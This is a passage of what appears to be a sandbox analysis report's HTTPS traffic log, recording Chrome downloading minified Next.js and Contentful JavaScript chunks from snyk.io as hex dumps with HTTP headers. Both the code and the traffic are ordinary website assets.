                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:01 UTC16384INData Raw: 26 26 28 63 2e 6c 6f 63 61 6c 65 3d 65 2e 64 65 74 65 63 74 65 64 4c 6f 63 61 6c 65 29 7d 72 65 74 75 72 6e 20 63 7d 7d 2c 35 30 36 33 31 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 72 28 65 2c 74 29 7b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 74 26 26 28 74 3d 7b 7d 29 2c 74 2e 6f 6e 6c 79 48 61 73 68 43 68 61 6e 67 65 29 7b 65 28 29 3b 72 65 74 75 72 6e 7d 6c 65 74 20 72 3d 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 6e 3d 72 2e 73 74 79 6c 65 2e 73 63 72 6f 6c 6c 42 65 68 61 76 69 6f 72 3b 72 2e 73 74 79 6c 65 2e 73 63 72 6f 6c 6c 42 65 68 61 76 69 6f 72 3d 22 61 75 74 6f 22 2c 74 2e 64 6f 6e 74 46 6f 72 63 65 4c 61 79 6f 75 74 7c 7c 72 2e 67 65 74 43 6c 69 65
                                                                                                                                                                                                                                                                                                              Data Ascii: &&(c.locale=e.detectedLocale)}return c}},50631:function(e,t){"use strict";function r(e,t){if(void 0===t&&(t={}),t.onlyHashChange){e();return}let r=document.documentElement,n=r.style.scrollBehavior;r.style.scrollBehavior="auto",t.dontForceLayout||r.getClie
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:01 UTC3599INData Raw: 74 45 6e 74 72 69 65 73 42 79 54 79 70 65 26 26 70 65 72 66 6f 72 6d 61 6e 63 65 2e 67 65 74 45 6e 74 72 69 65 73 42 79 54 79 70 65 28 22 6e 61 76 69 67 61 74 69 6f 6e 22 29 5b 30 5d 7d 2c 66 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 63 28 29 3b 72 65 74 75 72 6e 20 65 26 26 65 2e 61 63 74 69 76 61 74 69 6f 6e 53 74 61 72 74 7c 7c 30 7d 2c 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 72 3d 63 28 29 2c 6e 3d 22 6e 61 76 69 67 61 74 65 22 3b 72 65 74 75 72 6e 20 75 3e 3d 30 3f 6e 3d 22 62 61 63 6b 2d 66 6f 72 77 61 72 64 2d 63 61 63 68 65 22 3a 72 26 26 28 6e 3d 64 6f 63 75 6d 65 6e 74 2e 70 72 65 72 65 6e 64 65 72 69 6e 67 7c 7c 66 28 29 3e 30 3f 22 70 72 65 72 65 6e 64 65 72 22 3a 72 2e 74 79 70 65 2e 72 65 70 6c 61 63 65 28 2f
                                                                                                                                                                                                                                                                                                              Data Ascii: tEntriesByType&&performance.getEntriesByType("navigation")[0]},f=function(){var e=c();return e&&e.activationStart||0},d=function(e,t){var r=c(),n="navigate";return u>=0?n="back-forward-cache":r&&(n=document.prerendering||f()>0?"prerender":r.type.replace(/


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              35192.168.2.54975423.77.250.634434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:00 UTC522OUTGET /_next/static/chunks/pages/_app-0cbf3048c9ba7463.js HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:00 UTC776INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              Content-Disposition: inline; filename="_app-0cbf3048c9ba7463.js"
                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                              ETag: W/"7f16b636d5c74b50ae2eada438d25a23"
                                                                                                                                                                                                                                                                                                              Last-Modified: Mon, 21 Oct 2024 15:08:12 GMT
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/static/chunks/pages/_app-0cbf3048c9ba7463.js
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::r6wjb-1729523296908-7611defcc177
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:00 GMT
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Connection: Transfer-Encoding
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: Hit from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.5a1d4117.1729799340.1f60432
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:00 UTC15608INData Raw: 30 30 30 30 43 30 30 30 0d 0a 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 32 38 38 38 5d 2c 7b 35 31 30 37 35 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 61 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 61 28 37 34 33 33 31 29 2c 6e 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 2c 6f 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 74 79 70 65 6f 66 20 65 3b 72 65 74 75 72 6e 22 6e 75 6d 62 65 72 22 3d 3d 3d 74 7c 7c 22 6f 62 6a 65 63 74 22 3d 3d 3d 74 26 26 22 5b 6f 62 6a 65 63 74 20 4e 75 6d 62 65 72 5d 22 3d 3d 3d 6e 2e 63 61 6c 6c 28 65 29 7d 2c 73 3d 22 66 75 6e 63 74 69
                                                                                                                                                                                                                                                                                                              Data Ascii: 0000C000(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[2888],{51075:function(e,t,a){"use strict";var r=a(74331),n=Object.prototype.toString,o=function(e){var t=typeof e;return"number"===t||"object"===t&&"[object Number]"===n.call(e)},s="functi
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:00 UTC15891INData Raw: 74 6f 72 73 2e 6c 65 6e 67 74 68 26 26 65 2e 6f 70 65 6e 47 72 61 70 68 2e 76 69 64 65 6f 2e 61 63 74 6f 72 73 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 65 2e 70 72 6f 66 69 6c 65 26 26 67 2e 70 75 73 68 28 72 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 6d 65 74 61 22 2c 7b 6b 65 79 3a 22 76 69 64 65 6f 3a 61 63 74 6f 72 3a 30 22 2b 74 2c 70 72 6f 70 65 72 74 79 3a 22 76 69 64 65 6f 3a 61 63 74 6f 72 22 2c 63 6f 6e 74 65 6e 74 3a 65 2e 70 72 6f 66 69 6c 65 7d 29 29 2c 65 2e 72 6f 6c 65 26 26 67 2e 70 75 73 68 28 72 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 6d 65 74 61 22 2c 7b 6b 65 79 3a 22 76 69 64 65 6f 3a 61 63 74 6f 72 3a 72 6f 6c 65 3a 30 22 2b 74 2c 70 72 6f 70 65 72 74 79 3a 22 76 69 64 65 6f 3a 61 63 74 6f 72
                                                                                                                                                                                                                                                                                                              Data Ascii: tors.length&&e.openGraph.video.actors.forEach(function(e,t){e.profile&&g.push(r.createElement("meta",{key:"video:actor:0"+t,property:"video:actor",content:e.profile})),e.role&&g.push(r.createElement("meta",{key:"video:actor:role:0"+t,property:"video:actor
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:00 UTC16384INData Raw: 74 2c 74 29 2c 65 2e 65 78 70 6f 72 74 73 3d 74 2e 64 65 66 61 75 6c 74 29 7d 2c 37 34 30 38 30 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 61 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 49 6d 61 67 65 22 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 53 7d 7d 29 3b 6c 65 74 20 72 3d 61 28 33 38 37 35 34 29 2c 6e 3d 61 28 36 31 37 35 37 29 2c 6f 3d 61 28 38 35 38 39 33 29 2c 73 3d 6e 2e 5f 28 61 28 36 37 32 39 34 29 29 2c 69 3d 72 2e 5f 28 61 28 37 33 39 33 35 29 29 2c 6c
                                                                                                                                                                                                                                                                                                              Data Ascii: t,t),e.exports=t.default)},74080:function(e,t,a){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),Object.defineProperty(t,"Image",{enumerable:!0,get:function(){return S}});let r=a(38754),n=a(61757),o=a(85893),s=n._(a(67294)),i=r._(a(73935)),l
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:00 UTC1281INData Raw: 74 44 65 6c 61 79 3a 21 31 2c 74 69 6d 65 64 4f 75 74 3a 21 31 7d 3b 6c 65 74 7b 5f 72 65 73 3a 65 2c 5f 6f 70 74 73 3a 74 7d 3d 74 68 69 73 3b 65 2e 6c 6f 61 64 69 6e 67 26 26 28 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 74 2e 64 65 6c 61 79 26 26 28 30 3d 3d 3d 74 2e 64 65 6c 61 79 3f 74 68 69 73 2e 5f 73 74 61 74 65 2e 70 61 73 74 44 65 6c 61 79 3d 21 30 3a 74 68 69 73 2e 5f 64 65 6c 61 79 3d 73 65 74 54 69 6d 65 6f 75 74 28 28 29 3d 3e 7b 74 68 69 73 2e 5f 75 70 64 61 74 65 28 7b 70 61 73 74 44 65 6c 61 79 3a 21 30 7d 29 7d 2c 74 2e 64 65 6c 61 79 29 29 2c 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 74 2e 74 69 6d 65 6f 75 74 26 26 28 74 68 69 73 2e 5f 74 69 6d 65 6f 75 74 3d 73 65 74 54 69 6d 65 6f 75 74 28 28 29 3d 3e 7b 74 68 69 73
                                                                                                                                                                                                                                                                                                              Data Ascii: tDelay:!1,timedOut:!1};let{_res:e,_opts:t}=this;e.loading&&("number"==typeof t.delay&&(0===t.delay?this._state.pastDelay=!0:this._delay=setTimeout(()=>{this._update({pastDelay:!0})},t.delay)),"number"==typeof t.timeout&&(this._timeout=setTimeout(()=>{this
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:00 UTC3080INData Raw: 30 30 30 30 30 42 46 43 0d 0a 74 2e 69 6e 63 6c 75 64 65 73 28 61 29 29 72 65 74 75 72 6e 20 6c 28 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 64 28 65 2c 74 29 7b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 28 29 3b 6c 65 74 20 65 3d 72 2e 64 65 66 61 75 6c 74 2e 75 73 65 43 6f 6e 74 65 78 74 28 6e 2e 4c 6f 61 64 61 62 6c 65 43 6f 6e 74 65 78 74 29 3b 65 26 26 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 61 2e 6d 6f 64 75 6c 65 73 29 26 26 61 2e 6d 6f 64 75 6c 65 73 2e 66 6f 72 45 61 63 68 28 74 3d 3e 7b 65 28 74 29 7d 29 7d 28 29 3b 6c 65 74 20 73 3d 72 2e 64 65 66 61 75 6c 74 2e 75 73 65 53 79 6e 63 45 78 74 65 72 6e 61 6c 53 74 6f 72 65 28 6f 2e 73 75 62 73 63 72 69 62 65 2c 6f 2e 67 65 74 43 75 72 72 65 6e 74 56 61 6c 75 65 2c 6f 2e 67 65 74 43 75 72 72 65 6e 74
                                                                                                                                                                                                                                                                                                              Data Ascii: 00000BFCt.includes(a))return l()})}function d(e,t){!function(){l();let e=r.default.useContext(n.LoadableContext);e&&Array.isArray(a.modules)&&a.modules.forEach(t=>{e(t)})}();let s=r.default.useSyncExternalStore(o.subscribe,o.getCurrentValue,o.getCurrent
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:00 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 64 2c 7b 2e 2e 2e 41 2c 63 74 61 5f 6e 61 6d 65 3a 22 22 3d 3d 3d 6f 3f 22 6c 6f 67 6f 2d 69 6d 61 67 65 22 3a 6f 2c 63 74 61 5f 74 79 70 65 3a 22 22 2e 63 6f 6e 63 61 74 28 21 50 7c 7c 4e 3f 22 49 6e 74 65 72 6e 61 6c 22 3a 22 4f 75 74 62 6f 75 6e 64 22 2c 22 5f 62 75 74 74 6f 6e 22 29 2c 6c 69 6e 6b 5f 75 72 6c 3a 6e 75 6c 6c 21 3d 50 3f 50 3a 76 6f 69 64 20 30 2c 6f 75 74 62 6f 75 6e 64 3a 21 50 7c 7c 4e 3f 30 3a 31 2c 63 61 74 65 67 6f 72 79 5f 6e 61 6d 65 3a 65 2c 73 75 62 63 61 74 65 67 6f 72 79 5f 6e 61 6d 65 3a 6e 2c 2e 2e 2e 63 2c 2e 2e 2e 53 7d 29 7d 72 65 74 75 72 6e 20 6b 26 26 6b 28 65 29 7d 2c 74 61 62 49 6e 64 65 78 3a 62 2c 73 74 79 6c 65 3a 63 2c 22 64 61 74 61 2d 63 6f 6d 70 6f 6e 65 6e 74 22 3a 22 42 75 74
                                                                                                                                                                                                                                                                                                              Data Ascii: 00004000d,{...A,cta_name:""===o?"logo-image":o,cta_type:"".concat(!P||N?"Internal":"Outbound","_button"),link_url:null!=P?P:void 0,outbound:!P||N?0:1,category_name:e,subcategory_name:n,...c,...S})}return k&&k(e)},tabIndex:b,style:c,"data-component":"But
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:00 UTC12INData Raw: 62 65 72 2c 68 65 69 67 68 74 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: ber,height
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:01 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 3a 69 28 29 2e 6e 75 6d 62 65 72 2c 72 65 73 6f 75 72 63 65 54 79 70 65 3a 69 28 29 2e 73 74 72 69 6e 67 2c 76 69 64 65 6f 53 65 74 74 69 6e 67 73 3a 69 28 29 2e 73 68 61 70 65 28 7b 69 73 43 6f 6e 74 72 6f 6c 6c 65 64 3a 69 28 29 2e 62 6f 6f 6c 2c 61 75 74 6f 50 6c 61 79 3a 69 28 29 2e 62 6f 6f 6c 2c 69 73 4d 75 74 65 64 3a 69 28 29 2e 62 6f 6f 6c 7d 29 2c 68 61 73 43 6f 72 6e 65 72 52 61 64 69 75 73 3a 69 28 29 2e 62 6f 6f 6c 2c 68 61 73 53 68 61 64 6f 77 3a 69 28 29 2e 62 6f 6f 6c 7d 3b 76 61 72 20 67 3d 70 7d 2c 38 39 38 32 39 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 61 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 61 2e 64 28 74 2c 7b 5a 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 7d 7d 29 3b 76 61 72 20
                                                                                                                                                                                                                                                                                                              Data Ascii: 00004000:i().number,resourceType:i().string,videoSettings:i().shape({isControlled:i().bool,autoPlay:i().bool,isMuted:i().bool}),hasCornerRadius:i().bool,hasShadow:i().bool};var g=p},89829:function(e,t,a){"use strict";a.d(t,{Z:function(){return _}});var
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:01 UTC12INData Raw: 3d 28 6e 75 6c 6c 3d 3d 65 6b 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: =(null==ek
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:01 UTC16384INData Raw: 30 30 30 31 38 30 30 30 0d 0a 3f 76 6f 69 64 20 30 3a 6e 75 6c 6c 3d 3d 3d 28 76 3d 65 6b 2e 66 69 65 6c 64 73 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 76 3f 76 6f 69 64 20 30 3a 76 2e 6c 61 6e 67 75 61 67 65 29 3f 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 6e 75 6c 6c 3d 3d 65 6b 3f 76 6f 69 64 20 30 3a 6e 75 6c 6c 3d 3d 3d 28 6d 3d 65 6b 2e 66 69 65 6c 64 73 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6d 3f 76 6f 69 64 20 30 3a 6d 2e 6c 61 6e 67 75 61 67 65 29 3f 6e 75 6c 6c 3d 3d 65 6b 3f 76 6f 69 64 20 30 3a 6e 75 6c 6c 3d 3d 3d 28 66 3d 65 6b 2e 66 69 65 6c 64 73 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 66 3f 76 6f 69 64 20 30 3a 6e 75 6c 6c 3d 3d 3d 28 68 3d 66 2e 6c 61 6e 67 75 61 67 65 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 68 3f 76 6f 69 64 20 30 3a 68 2e 6a 6f 69 6e
                                                                                                                                                                                                                                                                                                              Data Ascii: 00018000?void 0:null===(v=ek.fields)||void 0===v?void 0:v.language)?Array.isArray(null==ek?void 0:null===(m=ek.fields)||void 0===m?void 0:m.language)?null==ek?void 0:null===(f=ek.fields)||void 0===f?void 0:null===(h=f.language)||void 0===h?void 0:h.join


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              36192.168.2.54975623.77.250.634434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:00 UTC516OUTGET /_next/static/chunks/9371-f3c21e360213617c.js HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:00 UTC770INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              Content-Disposition: inline; filename="9371-f3c21e360213617c.js"
                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                              ETag: W/"eaaa8f5b073bb1b854180a7bc6b205d3"
                                                                                                                                                                                                                                                                                                              Last-Modified: Fri, 18 Oct 2024 13:10:49 GMT
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/static/chunks/9371-f3c21e360213617c.js
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::2j4l7-1729257049147-53e36624112e
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:00 GMT
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Connection: Transfer-Encoding
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: Hit from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.5a1d4117.1729799340.1f6047e
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:00 UTC15614INData Raw: 30 30 30 30 43 30 30 30 0d 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 39 33 37 31 5d 2c 7b 37 34 31 32 39 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 69 2c 72 2c 6f 2c 61 2c 64 2c 73 2c 70 2c 6c 2c 79 2c 66 2c 63 2c 75 2c 45 2c 6d 2c 54 2c 4c 3d 6e 28 36 37 32 39 34 29 2c 53 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 28 53 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 3d 31 2c 69 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6e 3c 69 3b 6e 2b 2b 29 66 6f 72 28 76 61 72 20 72 20 69
                                                                                                                                                                                                                                                                                                              Data Ascii: 0000C000"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9371],{74129:function(e,t,n){var i,r,o,a,d,s,p,l,y,f,c,u,E,m,T,L=n(67294),S=function(){return(S=Object.assign||function(e){for(var t,n=1,i=arguments.length;n<i;n++)for(var r i
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:00 UTC15897INData Raw: 4c 49 4e 4b 2c 61 2e 49 4e 4c 49 4e 45 53 2e 45 4e 54 52 59 5f 48 59 50 45 52 4c 49 4e 4b 2c 61 2e 49 4e 4c 49 4e 45 53 2e 41 53 53 45 54 5f 48 59 50 45 52 4c 49 4e 4b 2c 61 2e 49 4e 4c 49 4e 45 53 2e 45 4d 42 45 44 44 45 44 5f 45 4e 54 52 59 2c 22 74 65 78 74 22 5d 2c 74 2e 56 31 5f 4d 41 52 4b 53 3d 5b 64 2e 4d 41 52 4b 53 2e 42 4f 4c 44 2c 64 2e 4d 41 52 4b 53 2e 43 4f 44 45 2c 64 2e 4d 41 52 4b 53 2e 49 54 41 4c 49 43 2c 64 2e 4d 41 52 4b 53 2e 55 4e 44 45 52 4c 49 4e 45 5d 7d 2c 37 31 30 32 34 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 74 2e 67 65 74 53 63 68 65 6d 61 57 69 74 68 4e 6f 64 65 54 79
                                                                                                                                                                                                                                                                                                              Data Ascii: LINK,a.INLINES.ENTRY_HYPERLINK,a.INLINES.ASSET_HYPERLINK,a.INLINES.EMBEDDED_ENTRY,"text"],t.V1_MARKS=[d.MARKS.BOLD,d.MARKS.CODE,d.MARKS.ITALIC,d.MARKS.UNDERLINE]},71024:function(e,t,n){Object.defineProperty(t,"__esModule",{value:!0}),t.getSchemaWithNodeTy
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:01 UTC16384INData Raw: 6c 69 6e 6b 54 79 70 65 22 2c 22 74 79 70 65 22 5d 7d 7d 2c 22 61 64 64 69 74 69 6f 6e 61 6c 50 72 6f 70 65 72 74 69 65 73 22 3a 66 61 6c 73 65 2c 22 72 65 71 75 69 72 65 64 22 3a 5b 22 73 79 73 22 5d 7d 2c 22 54 65 78 74 22 3a 7b 22 74 79 70 65 22 3a 22 6f 62 6a 65 63 74 22 2c 22 70 72 6f 70 65 72 74 69 65 73 22 3a 7b 22 6e 6f 64 65 54 79 70 65 22 3a 7b 22 74 79 70 65 22 3a 22 73 74 72 69 6e 67 22 2c 22 65 6e 75 6d 22 3a 5b 22 74 65 78 74 22 5d 7d 2c 22 76 61 6c 75 65 22 3a 7b 22 74 79 70 65 22 3a 22 73 74 72 69 6e 67 22 7d 2c 22 6d 61 72 6b 73 22 3a 7b 22 74 79 70 65 22 3a 22 61 72 72 61 79 22 2c 22 69 74 65 6d 73 22 3a 7b 22 24 72 65 66 22 3a 22 23 2f 64 65 66 69 6e 69 74 69 6f 6e 73 2f 4d 61 72 6b 22 7d 7d 2c 22 64 61 74 61 22 3a 7b 22 24 72 65 66 22
                                                                                                                                                                                                                                                                                                              Data Ascii: linkType","type"]}},"additionalProperties":false,"required":["sys"]},"Text":{"type":"object","properties":{"nodeType":{"type":"string","enum":["text"]},"value":{"type":"string"},"marks":{"type":"array","items":{"$ref":"#/definitions/Mark"}},"data":{"$ref"
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:01 UTC1269INData Raw: 64 69 6e 67 2d 32 22 2c 22 68 65 61 64 69 6e 67 2d 33 22 2c 22 68 65 61 64 69 6e 67 2d 34 22 2c 22 68 65 61 64 69 6e 67 2d 35 22 2c 22 68 65 61 64 69 6e 67 2d 36 22 2c 22 6f 72 64 65 72 65 64 2d 6c 69 73 74 22 2c 22 75 6e 6f 72 64 65 72 65 64 2d 6c 69 73 74 22 2c 22 6c 69 73 74 2d 69 74 65 6d 22 2c 22 68 72 22 2c 22 62 6c 6f 63 6b 71 75 6f 74 65 22 2c 22 65 6d 62 65 64 64 65 64 2d 65 6e 74 72 79 2d 62 6c 6f 63 6b 22 2c 22 65 6d 62 65 64 64 65 64 2d 61 73 73 65 74 2d 62 6c 6f 63 6b 22 2c 22 65 6d 62 65 64 64 65 64 2d 72 65 73 6f 75 72 63 65 2d 62 6c 6f 63 6b 22 2c 22 74 61 62 6c 65 22 2c 22 74 61 62 6c 65 2d 72 6f 77 22 2c 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 22 74 61 62 6c 65 2d 68 65 61 64 65 72 2d 63 65 6c 6c 22 5d 7d 2c 22 49 6e 6c 69 6e 65 22 3a 7b
                                                                                                                                                                                                                                                                                                              Data Ascii: ding-2","heading-3","heading-4","heading-5","heading-6","ordered-list","unordered-list","list-item","hr","blockquote","embedded-entry-block","embedded-asset-block","embedded-resource-block","table","table-row","table-cell","table-header-cell"]},"Inline":{
